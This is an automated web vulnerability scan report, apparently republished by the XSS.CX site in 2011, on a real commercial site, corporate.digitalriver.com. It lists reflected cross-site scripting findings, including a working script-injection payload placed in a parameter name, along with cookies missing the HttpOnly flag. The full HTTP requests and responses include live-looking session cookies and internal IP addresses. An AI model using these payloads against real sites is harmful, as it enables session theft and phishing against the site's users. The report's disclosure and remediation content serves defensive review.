XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, corporate.digitalriver.com Report generated by XSS.CX at Sun Sep 04 08:24:54 GMT-06:00 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. Cross-site scripting (reflected)
1.1. http://corporate.digitalriver.com/store [name of an arbitrarily supplied request parameter]
1.2. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage [name of an arbitrarily supplied request parameter]
2. Cookie without HttpOnly flag set
2.1. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
2.2. http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
2.3. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/cm/images/home_repl_1.jpg
2.4. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif
2.5. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/ce.jpg
2.6. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/games.jpg
2.7. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonComerce.gif
2.8. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonMarketing.gif
2.9. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonPayment2.gif
2.10. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/software.jpg
2.11. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery-1.3.2.min.js
2.12. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.easing.1.3.js
2.13. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox-1.2.1.pack.js
2.14. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox.css
2.15. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/swfobject.js
2.16. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage
3. Cross-domain Referer leakage
3.1. http://corporate.digitalriver.com/store
3.2. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage
4. Cross-domain script include
4.1. http://corporate.digitalriver.com/store
4.2. http://corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs
4.3. http://corporate.digitalriver.com/store/digriv/Corp/sectionName.payment/subSectionName.paymentOverview/page.paymentOverview
4.4. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage
5. Private IP addresses disclosed
5.1. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
5.2. http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
6. Content type incorrectly stated
6.1. http://corporate.digitalriver.com/favicon.ico
6.2. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
6.3. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage
1. Cross-site scripting (reflected)
next
There are 2 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://corporate.digitalriver.com/store [name of an arbitrarily supplied request parameter]
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://corporate.digitalriver.com
Path:
/store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87700-->42ee04a8087 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=xss&x=0&y=0&87700-->42ee04a8087 =1 HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145926231; fcPT=http%3A//corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs; fcC=X=C708273219&Y=1315145926358&FV=10&H=1315145926231&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=2&E=201359&F=0&I=1315145947293
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114053839011,0) Date: Sun, 04 Sep 2011 14:19:10 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app53 Content-Length: 48029 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <!--!esi:include src="/store?87700-->42ee04a8087 =1&Action=DisplayESIPage&CallingPageID=CorpPage&Currency=USD&ESIHC=69e81329&Env=BASE&Locale=en_US&SiteID=digriv&StyleID=27010600&StyleVersion=76&ThemeID=16015700&ceid=173655500&cename=TopHeader&id=Prod...[SNIP]...
1.2. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/html/pbPage.Homepage
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da9c3--><script>alert(1)</script>dd29a7ec5c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--><script>alert(1)</script>dd29a7ec5c0 =1 HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145843969; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; fcC=X=C708273219&Y=1315145843991&FV=10&H=1315145843969&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=23859444886,0) Date: Sun, 04 Sep 2011 14:17:51 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app58 Content-Length: 67580 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=69e81329&Env=BASE&Locale=en_US&SiteID=digriv&StyleID=27010600&StyleVersion=76&ceid=173655500&cename=TopHeader&da9c3--><script>alert(1)</script>dd29a7ec5c0 =1&id=ContentTheme&pbPage=Homepage&script>...[SNIP]...
2. Cookie without HttpOnly flag set
previous
next
There are 16 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
2.1. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ORA_WX_SESSION="10.1.2.212:260-0#0"; path=/ JSESSIONID=67095CF4E57BB1931F717EC7D3CE6B56; path=/ VISITOR_ID=971D4E8DFAED43674226FBB5874B1E24DDCD475DE29678F5; expires=Mon, 03-Sep-2012 20:10:59 GMT; path=/ The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a; op393dr_homepage_demo1gum=a04e07i0a12794q0634yf92b6; op393dr_homepage_demo1liid=a04e07i0a12794q0634yf92b6; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmb=94877326.1.10.1315146138; __utmc=94877326; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmb=94877326.2.10.1315146138; __utmc=94877326; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; BIGipServerp-drh-dc1pod5-pool1-active=3556901130.260.0000; fcOOS=fcOptOutChip=undefined; fcC=X=C781953390&Y=1315146141467&FV=-1&H=1315146141029&Z=0&E=2283193&F=0&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com; fcP=C=0&T=1315146141467&DTO=1315146141029&U=781953390&V=1315146141029; fcR=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue; fcPT=http%3A//corporate.digitalriver.com/store/digriv/html/pbPage.Homepage%3Fresid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1315145806740%26da9c3--%253E%253Cscript%253Eprompt%28document.location%29%253C/script%253Edd29a7ec5c0%3D1
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/css;charset=UTF-8Set-Cookie: ORA_WX_SESSION="10.1.2.212:260-0#0"; path=/ Set-Cookie: JSESSIONID=67095CF4E57BB1931F717EC7D3CE6B56; path=/ Set-Cookie: VISITOR_ID=971D4E8DFAED43674226FBB5874B1E24DDCD475DE29678F5; expires=Mon, 03-Sep-2012 20:10:59 GMT; path=/ Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=23859686939,0) Date: Sun, 04 Sep 2011 14:21:47 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app56 Content-Length: 6619 <!-- REQUEST ID: TIME=1315146107623:NODE=c1a5601:THREAD=242 --> <!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=digriv&ThemeID=16015700&ceid=175581900...[SNIP]...
2.2. http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://corporate.digitalriver.com
Path:
/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ORA_WX_SESSION="10.1.2.73:260-0#0"; path=/ JSESSIONID=86C536518740DCEA6999FE20F5D60BBA; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://www.digitalriver.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: ORA_WX_SESSION="10.1.2.73:260-0#0"; path=/ Set-Cookie: JSESSIONID=86C536518740DCEA6999FE20F5D60BBA; path=/ Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=23859425004,0) Date: Sun, 04 Sep 2011 14:17:33 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app58 Content-Length: 7656 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]...
2.3. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/cm/images/home_repl_1.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/digriv/cm/images/home_repl_1.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=3540123914.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/digriv/cm/images/home_repl_1.jpg HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Fri, 14 Aug 2015 02:17:20 GMT ETag: "1100b-4c65695a" Content-Type: image/jpeg Last-Modified: Fri, 13 Aug 2010 15:48:42 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=1864;ecid=23859677534,0) Content-Length: 69643 Date: Fri, 13 Aug 2010 20:17:20 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app55 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3540123914.260.0000; path=/ ......JFIF.....d.d......Ducky.......2......Adobe.d.......................... .. .......................#"""#''''''''''. .. . ...................................!! !!''''''''''..............[SNIP]...
2.4. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=3271688458.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 11 Aug 2016 22:27:40 GMT ETag: "134-4c6445dc" Content-Type: image/gif Last-Modified: Thu, 12 Aug 2010 19:05:00 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=2899;ecid=23859678213,0) Content-Length: 308 Date: Fri, 12 Aug 2011 16:27:40 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app51 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3271688458.260.0000; path=/ GIF89a................j.....T..r........j..I..........a........u..............;..E...........m..b...........!.......,.............AMi..!~.d..k.....0 .$./.b.....d.al2DEC@".A .'b.(.%.j2...D..B.....@..u...[SNIP]...
2.5. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/ce.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/digriv/pb/images/HomePage/ce.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=3540123914.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/ce.jpg HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Wed, 20 Apr 2016 16:02:03 GMT ETag: "24ba-4bd96dce" Content-Type: image/jpeg Last-Modified: Thu, 29 Apr 2010 11:30:22 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=1864;ecid=23859680367,0) Content-Length: 9402 Date: Thu, 21 Apr 2011 10:02:03 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app55 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3540123914.260.0000; path=/ ......JFIF.....d.d......Ducky.......d.....&Adobe.d........... ...2.......Y..$.............................................................................................................................[SNIP]...
2.6. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/games.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/digriv/pb/images/HomePage/games.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=3556901130.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/games.jpg HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 11 Aug 2016 00:05:38 GMT ETag: "15ea-4bd96ddb" Content-Type: image/jpeg Last-Modified: Thu, 29 Apr 2010 11:30:35 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=631;ecid=23859681551,0) Content-Length: 5610 Date: Thu, 11 Aug 2011 18:05:38 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app56 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3556901130.260.0000; path=/ ......JFIF.....d.d......Ducky.......d.....&Adobe.d........... ...o........................................................................................................................................[SNIP]...
2.7. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonComerce.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonComerce.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=3573678346.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
